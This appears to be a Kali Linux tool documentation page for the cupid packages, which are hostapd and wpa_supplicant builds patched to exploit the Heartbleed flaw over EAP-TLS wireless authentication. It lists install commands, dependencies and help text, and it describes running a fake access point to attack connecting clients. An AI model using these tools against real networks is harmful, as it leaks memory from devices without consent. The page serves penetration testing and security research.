Packages and Binaries:
cupid-hostapd provide a binary of the same name that has been patched to exploit the heartbleed vulnerability over EAP TLS tunneled protocols (EAP-PEAP, EAP-TLS, EAP-TTLS) in use in wireless networks.
With cupid-hostapd you can setup a fake wireless network to exploit the vulnerability of terminals that try to connect to it.
Please see presentation slides for a simple introduction to cupid: http://www.slideshare.net/lgrangeia
Installed size: 739 KB
How to install: sudo apt install cupid-hostapd
cupid-hostapd
IEEE 802.11 AP, IEEE 802.1X/WPA/WPA2/EAP/RADIUS Authenticator
[email protected]:~# cupid-hostapd --help cupid-hostapd: invalid option -- '-' hostapd v2.1 User space daemon for IEEE 802.11 AP management, IEEE 802.1X/WPA/WPA2/EAP/RADIUS Authenticator Copyright (c) 2002-2014, Jouni Malinen [email protected]> and contributors usage: hostapd [-hdBKtv] [-P ] [-e ] \ [-g ] [-G ] \ options: -h show this usage -d show more debug messages (-dd for even more) -B run daemon in the background -e entropy file -g global control interface path -G group for control interfaces -P PID file -K include key data in debug messages -t include timestamps in some debug messages -v show hostapd version cupid-hostapd_cli
Hostapd command-line interface
[email protected]:~# cupid-hostapd_cli -h hostapd_cli v2.1 Copyright (c) 2004-2014, Jouni Malinen [email protected]> and contributors usage: hostapd_cli [-p] [-i] [-hvB] [-a] \ [-G] [command..] Options: -h help (show this usage text) -v shown version information -p path to find control sockets (default: /var/run/hostapd) -a run in daemon mode executing the action file based on events from hostapd -B run a daemon in the background -i Interface to listen on (default: first interface found in the socket path) Commands: mib get MIB variables (dot1x, dot11, radius) sta get MIB variables for one station all_sta get MIB variables for all stations new_sta add a new station deauthenticate deauthenticate a station disassociate disassociate a station get_config show current configuration help show this usage help interface [ifname] show interfaces/select interface level change debug level license show full hostapd_cli license quit exit hostapd_cli cupid-wpasupplicant
cupid-wpasupplicant provides a binary of the same name that has been patched to exploit the heartbleed vulnerability over EAP TLS tunneled protocols (EAP-PEAP, EAP-TLS, EAP-TTLS) in use in wireless networks.
With cupid-wpasupplicant you can try to exploit the vulnerability on wireless access points.
Please see presentation slides for a simple introduction to cupid: http://www.slideshare.net/lgrangeia
Installed size: 2.15 MB
How to install: sudo apt install cupid-wpasupplicant
- adduser
- initscripts
- libc6
- libdbus-1-3
- libnl-3-200
- libnl-genl-3-200
- libpcsclite1
- libreadline8
- libunsafessl1.0.2
cupid-wpa_cli
[email protected]:~# cupid-wpa_cli -h wpa_cli [-p] [-i] [-hvB] [-a] \ [-P] [-g] [-G] [command..] -h = help (show this usage text) -v = shown version information -a = run in daemon mode executing the action file based on events from wpa_supplicant -B = run a daemon in the background default path: /var/run/wpa_supplicant default interface: first interface found in socket path commands: status [verbose] = get current WPA/EAPOL/EAP status ifname = get current interface name ping = pings wpa_supplicant relog = re-open log-file (allow rolling logs) note = add a note to wpa_supplicant debug log mib = get MIB variables (dot1x, dot11) help [command] = show usage help interface [ifname] = show interfaces/select interface level = change debug level license = show full wpa_cli license quit = exit wpa_cli set = set variables (shows list of variables when run without arguments) get = get information logon = IEEE 802.1X EAPOL state machine logon logoff = IEEE 802.1X EAPOL state machine logoff pmksa = show PMKSA cache reassociate = force reassociation preauthenticate = force preauthentication identity = configure identity for an SSID password = configure password for an SSID new_password = change password for an SSID pin = configure pin for an SSID otp = configure one-time-password for an SSID passphrase = configure private key passphrase for an SSID sim = report SIM operation result bssid = set preferred BSSID for an SSID blacklist = add a BSSID to the blacklist blacklist clear = clear the blacklist blacklist = display the blacklist log_level [] = update the log level/timestamp log_level = display the current log level and log options list_networks = list configured networks select_network = select a network (disable others) enable_network = enable a network disable_network = disable a network add_network = add a network remove_network = remove a network set_network = set network variables (shows list of variables when run without arguments) get_network = get network variables list_creds = list configured credentials add_cred = add a credential remove_cred = remove a credential set_cred = set credential variables save_config = save the current configuration disconnect = disconnect and wait for reassociate/reconnect command before connecting reconnect = like reassociate, but only takes effect if already disconnected scan = request new BSS scan scan_results = get latest scan results bss | > = get detailed scan result info get_capability = get capabilies reconfigure = force wpa_supplicant to re-read its configuration file terminate = terminate wpa_supplicant interface_add = adds new interface, all parameters but are optional interface_remove = removes the interface interface_list = list available interfaces ap_scan = set ap_scan parameter scan_interval = set scan_interval parameter (in seconds) bss_expire_age = set BSS expiration age parameter bss_expire_count = set BSS expiration scan count parameter bss_flush = set BSS flush age (0 by default) stkstart = request STK negotiation with ft_ds = request over-the-DS FT with wps_pbc [BSSID] = start Wi-Fi Protected Setup: Push Button Configuration wps_pin [PIN] = start WPS PIN method (returns PIN, if not hardcoded) wps_check_pin = verify PIN checksum wps_cancel Cancels the pending WPS operation wps_nfc [BSSID] = start Wi-Fi Protected Setup: NFC wps_nfc_config_token = build configuration token wps_nfc_token = create password token wps_nfc_tag_read = report read NFC tag with WPS data nfc_get_handover_req = create NFC handover request nfc_get_handover_sel = create NFC handover select nfc_rx_handover_req = report received NFC handover request nfc_rx_handover_sel = report received NFC handover select nfc_report_handover = report completed NFC handover wps_reg = start WPS Registrar to configure an AP wps_ap_pin [params..] = enable/disable AP PIN wps_er_start [IP address] = start Wi-Fi Protected Setup External Registrar wps_er_stop = stop Wi-Fi Protected Setup External Registrar wps_er_pin = add an Enrollee PIN to External Registrar wps_er_pbc = accept an Enrollee PBC using External Registrar wps_er_learn = learn AP configuration wps_er_set_config = set AP configuration for enrolling wps_er_config = configure AP wps_er_nfc_config_token = build NFC configuration token ibss_rsn = request RSN authentication with in IBSS sta = get information about an associated station (AP) all_sta = get information about all associated stations (AP) deauthenticate = deauthenticate a station disassociate = disassociate a station chan_switch [sec_channel_offset=] [center_freq1=] [center_freq2=] [bandwidth=] [blocktx] [ht|vht] = CSA parameters suspend = notification of suspend/hibernate resume = notification of resume/thaw drop_sa = drop SA without deauth/disassoc (test command) roam = roam to the specified BSS p2p_find [timeout] [type=*] = find P2P Devices for up-to timeout seconds p2p_stop_find = stop P2P Devices search p2p_connect <"pbc"|PIN>[ht40] = connect to a P2P Device p2p_listen [timeout] = listen for P2P Devices for up-to timeout seconds p2p_group_remove = remove P2P group interface (terminate group if GO) p2p_group_add [ht40] = add a new P2P group (local end as GO) p2p_prov_disc = request provisioning discovery p2p_get_passphrase = get the passphrase for a group (GO only) p2p_serv_disc_req = schedule service discovery request p2p_serv_disc_cancel_req = cancel pending service discovery request p2p_serv_disc_resp = service discovery response p2p_service_update = indicate change in local services p2p_serv_disc_external = set external processing of service discovery p2p_service_flush = remove all stored service entries p2p_service_add = add a local service p2p_service_del [|service] = remove a local service p2p_reject = reject connection attempts from a specific peer p2p_invite [peer=addr] = invite peer p2p_peers [discovered] = list known (optionally, only fully discovered) P2P peers p2p_peer = show information about known P2P peer p2p_set = set a P2P parameter p2p_flush = flush P2P state p2p_cancel = cancel P2P group formation p2p_unauthorize = unauthorize a peer p2p_presence_req [ ] [ ] = request GO presence p2p_ext_listen [ ] = set extended listen timing p2p_remove_client = remove a peer from all groups wfd_subelem_set [contents] = set Wi-Fi Display subelement wfd_subelem_get = get Wi-Fi Display subelement fetch_anqp = fetch ANQP information for all APs stop_fetch_anqp = stop fetch_anqp operation interworking_select [auto] = perform Interworking network selection interworking_connect = connect using Interworking credentials anqp_get [,]. = request ANQP information gas_request [QueryReq] = GAS request gas_response_get [start,len] = Fetch last GAS response hs20_anqp_get [,]. = request HS 2.0 ANQP information nai_home_realm_list = get HS20 nai home realm list sta_autoconnect = disable/enable automatic reconnection tdls_discover = request TDLS discovery with tdls_setup = request TDLS setup with tdls_teardown = tear down TDLS with signal_poll = get signal parameters pktcnt_poll = get TX/RX packet counters reauthenticate = trigger IEEE 802.1X/EAPOL reauthentication autoscan [params] = Set or unset (if none) autoscan parameters wnm_sleep [interval=#] = enter/exit WNM-Sleep mode wnm_bss_query = Send BSS Transition Management Query raw = Sent unprocessed command flush = flush wpa_supplicant state radio_work = radio_work cupid-wpa_passphrase
Generate a WPA PSK from an ASCII passphrase for a SSID
[email protected]:~# man cupid-wpa_passphrase WPA_PASSPHRASE(8) WPA_PASSPHRASE(8) NAME wpa_passphrase - Generate a WPA PSK from an ASCII passphrase for a SSID SYNOPSIS wpa_passphrase [ ssid ] [ passphrase ] OVERVIEW wpa_passphrase pre-computes PSK entries for network configuration blocks of a wpa_supplicant.conf file. An ASCII passphrase and SSID are used to generate a 256-bit PSK. OPTIONS ssid The SSID whose passphrase should be derived. passphrase The passphrase to use. If not included on the command line, passphrase will be read from standard input. SEE ALSO wpa_supplicant.conf(5) wpa_supplicant(8) LEGAL wpa_supplicant is copyright (c) 2003-2014, Jouni Malinen [email protected]> and contributors. All Rights Reserved. This program is licensed under the BSD license (the one with advertise- ment clause removed). 12 April 2023 WPA_PASSPHRASE(8) cupid-wpa_supplicant
Wi-Fi Protected Access client and IEEE 802.1X supplicant
[email protected]:~# cupid-wpa_supplicant -h wpa_supplicant v2.1 Copyright (c) 2003-2014, Jouni Malinen [email protected]> and contributors This software may be distributed under the terms of the BSD license. See README for more details. This product includes software developed by the OpenSSL Project for use in the OpenSSL Toolkit (http://www.openssl.org/) usage: wpa_supplicant [-BddhKLqqstuvW] [-P] [-g] \ [-G] \ -i -c [-C] [-D] [-p] \ [-b] [-e] [-f] \ [-o] [-O] \ [-N -i -c [-C] [-D] \ [-p] [-b] [-I] . ] drivers: nl80211 = Linux nl80211/cfg80211 wext = Linux wireless extensions (generic) wired = Wired Ethernet driver none = no driver (RADIUS server/WPS ER) options: -b = optional bridge interface name -B = run daemon in the background -c = Configuration file -C = ctrl_interface parameter (only used if -c is not) -i = interface name -I = additional configuration file -d = increase debugging verbosity (-dd even more) -D = driver name (can be multiple drivers: nl80211,wext) -e = entropy file -f = log output to debug file instead of stdout -g = global ctrl_interface -G = global ctrl_interface group -K = include keys (passwords, etc.) in debug output -s = log output to syslog instead of stdout -T = record to Linux tracing in addition to logging (records all messages regardless of debug verbosity) -t = include timestamp in debug messages -h = show this help text -L = show license (BSD) -o = override driver parameter for new interfaces -O = override ctrl_interface parameter for new interfaces -p = driver parameters -P = PID file -q = decrease debugging verbosity (-qq even less) -u = enable DBus control interface -v = show version -W = wait for a control interface monitor before starting -N = start describing new interface example: wpa_supplicant -Dnl80211 -iwlan0 -c/etc/wpa_supplicant.conf